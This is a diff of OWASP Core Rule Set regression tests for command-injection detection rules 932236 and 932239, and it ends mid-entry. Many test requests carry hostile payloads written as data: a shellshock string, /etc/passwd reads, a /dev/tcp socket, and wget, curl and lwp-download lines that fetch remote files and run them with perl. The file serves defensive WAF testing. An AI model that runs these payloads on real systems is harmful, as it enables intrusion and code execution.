- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 38 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 39 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP 
CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-40 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-41 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-42 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 40 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log_contains: id "932236" + - test_id: 41 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: 
"931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "932236" + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-43 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-44 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + 
method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 44 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-45 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 45 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=settings" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-46 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=settings" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 46 desc: False positive against "time" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "var=hello; time he came" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-47 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=hello; time he came" + version: HTTP/1.1 + output: + no_log_contains: id "932236" + - test_id: 47 desc: False positive against "more" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a hero; more than" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-48 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a hero; more than" + version: HTTP/1.1 + output: + no_log_contains: id "932236" + - test_id: 48 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=environment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=environment" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 49 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 50 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=env --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-51 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=env --version" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 51 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-52 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 52 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 5 desc: True 
Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf 
- method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-8 + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: Something true positive „The Title”. 
After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 9 desc: "False negative report - user agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ;cp /var/log/apache2/error.log evil.php - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: ;cp /var/log/apache2/error.log evil.php + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 10 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "python-requests/2.31.0" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "python-requests/2.31.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 11 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Python-urllib/3.9" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Python-urllib/3.9" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 12 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: 
HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 13 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "w3m/0.5.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "w3m/0.5.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 14 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 
170x48)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 15 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "wget" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "wget" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 16 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "curl/7.81.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "curl/7.81.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 17 desc: "Negative 
